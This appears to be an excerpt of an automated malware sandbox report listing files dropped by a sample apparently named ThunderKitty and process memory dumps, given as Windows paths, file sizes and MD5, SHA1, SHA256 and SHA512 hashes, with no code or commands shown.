0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
826ca040e1f9e84acd20f789d81903f6

SHA1
4d997b017a5cbf868011df6623793770c86a377b

SHA256
eb551c927c34363036e8e2186ff9c7693d0271165358972cf5342f22499fe62a

SHA512
9a013fc1302ce4eeb2781b237c32070ed3008bdb85ab6310eed4064558a2547cf677faeb366a6da112c3d06d53ab83c1693c5c27b6aee8284503ce80c62ab660

Download Submit
C:\Users\Admin\AppData\Local\Temp\2m422dcj\2m422dcj.dll

Filesize
4KB

MD5
124d01aa592031084d3f5075791a2ad4

SHA1
89bbec58acd48941e7de136a265c4f6add1752d0

SHA256
c510f8cbc1ad7cc5ec5e03e6fac718e5ee8e354f0f3cfc869822ec9b5eafdfb9

SHA512
81137006bc3b8f2aebea16dde6b283878bf5f14e031e1e7631ce00ee9e60718d53f2c5a0d62146cb4aa8bffad752ffe8896c5284882acf0db07f30e8aa74edf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5BCC.tmp

Filesize
1KB

MD5
45a70283ace48d498d1d2ccd39657630

SHA1
89783171175185d1e4c27823a770207199dda879

SHA256
85f51025e01a7727910b4eca094d5bbf06ee38c96f57d05b1c6290d07f9497da

SHA512
0e05ac9a24b9650228cca554f20a2d654e138971f6629eb568995b37db46f107c104c55422320127bae0db301e9abde39183275ce26c875710506562f62ff8ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
97KB

MD5
dd8f87919d3cda4d0662154b8fe13932

SHA1
442f0a37a5ddfdb81fc79c922843538919e9f0cd

SHA256
7e22fd21b91f2313089f77c42ba98729bcc2f3d94bd41de9b5f3f35d174c395d

SHA512
f6962a71373c94c39ef6a5192478c9d2c61952b59c404c48852bb82de67b620f94486542595d2c0ccd1c48ef3d915614b91cf6a6132225b5a118b87c200720fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
24KB

MD5
06f90e9cae87025cdd6e9f6562673592

SHA1
683239a619d9d47b802d11df5c29818051b50b56

SHA256
38c0002ac05807a034e32acc7d688c617d748666ba8ddd3f015d4334f5d85511

SHA512
7ab1b4c95c5cd54bc751c293376132ab850ab57a8b0c7b90c6f08ff96862029d565a83514b391dcfd35841c5f5313920ccb1476719925b071cbfaa9e395d47e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z1aeyp3q.fts.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2m422dcj\2m422dcj.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2m422dcj\2m422dcj.cmdline

Filesize
369B

MD5
503dc15fbd702207a30ca797c3a6eb6e

SHA1
4832a7e7546f8020c694647bdb539341bc44283d

SHA256
2b0088b6de35fd6821dee0cee7684a96a20329a4715a245de9fd5e882a332fbc

SHA512
bcf598315b8c8cbd8b44fea63060ea8a2ba6104488d31abfafc2d00b7e198662168c30bd0d08109785c29fd7e0f9c2c849c372da9b8a64dfd733388e8aad54bb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2m422dcj\CSC5A05D9AEF4164C45B33484D92E0128.TMP

Filesize
652B

MD5
98acada5446f6cab472d6c07b9d0a7b9

SHA1
25c49354197965c1aa398bc8f931c221fc96c240

SHA256
5e433acd3c7a4bb6691576047b790d3db2360c4ffc2135144dde6e05c840ec69

SHA512
49a3fc9906dc02da3eecd3fb8d6c00fb2c2cf5c4278e793a8fcceb4e50e7b3da13a9d221803d4b60f7e94bb0d8999b940581387d3529221b72273f3afc63fe95

Download Submit
memory/2820-70-0x0000027E79F10000-0x0000027E7A6B6000-memory.dmp

Filesize
7.6MB

Download
memory/2820-7-0x0000027E79270000-0x0000027E79292000-memory.dmp

Filesize
136KB

Download
memory/2820-44-0x00007FFBED420000-0x00007FFBEDEE1000-memory.dmp

Filesize
10.8MB

Download
memory/2820-23-0x00007FFBED420000-0x00007FFBEDEE1000-memory.dmp

Filesize
10.8MB

Download
memory/2820-75-0x00007FFBED420000-0x00007FFBEDEE1000-memory.dmp

Filesize
10.8MB

Download
memory/2820-22-0x00007FFBED420000-0x00007FFBEDEE1000-memory.dmp

Filesize
10.8MB

Download
memory/3480-34-0x00007FFBED420000-0x00007FFBEDEE1000-memory.dmp

Filesize
10.8MB

Download
memory/3480-69-0x00007FFBED420000-0x00007FFBEDEE1000-memory.dmp

Filesize
10.8MB

Download
memory/3480-0-0x00007FFBED423000-0x00007FFBED425000-memory.dmp

Filesize
8KB

Download
memory/3480-1-0x00007FFBED420000-0x00007FFBEDEE1000-memory.dmp

Filesize
10.8MB

Download
memory/4196-79-0x0000026858F90000-0x0000026858FB4000-memory.dmp

Filesize
144KB

Download
memory/4196-112-0x0000026858F80000-0x0000026858F92000-memory.dmp

Filesize
72KB

Download
memory/4196-113-0x0000026858F60000-0x0000026858F6A000-memory.dmp

Filesize
40KB

Download
memory/4196-61-0x0000026858980000-0x0000026858988000-memory.dmp

Filesize
32KB

Download
memory/4196-78-0x0000026858F90000-0x0000026858FBA000-memory.dmp

Filesize
168KB

Download